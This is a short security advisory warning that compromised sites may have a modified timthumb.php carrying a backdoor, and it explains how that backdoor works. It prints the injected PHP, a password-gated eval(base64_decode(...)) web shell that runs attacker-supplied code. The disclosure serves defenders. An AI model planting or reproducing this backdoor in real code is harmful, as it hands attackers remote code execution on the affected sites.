If your site got compromised lately with the TimThumb.php vulnerability, make sure to check that script to see if it was not modified to act as a backdoor as well.
We are seeing in many sites the timthumb.php with the following code added to it:
if (md5 (md5($_POST['p']))===’xxx8ab2ab.. a4ec61072xxx’)
die (eval ( base64_decode ($_POST['c'])));
If you are not sure what this code does, it receives a password via the “p” POST and if it is correct, it executes any PHP code sent by the attackers in the “c” POST variable.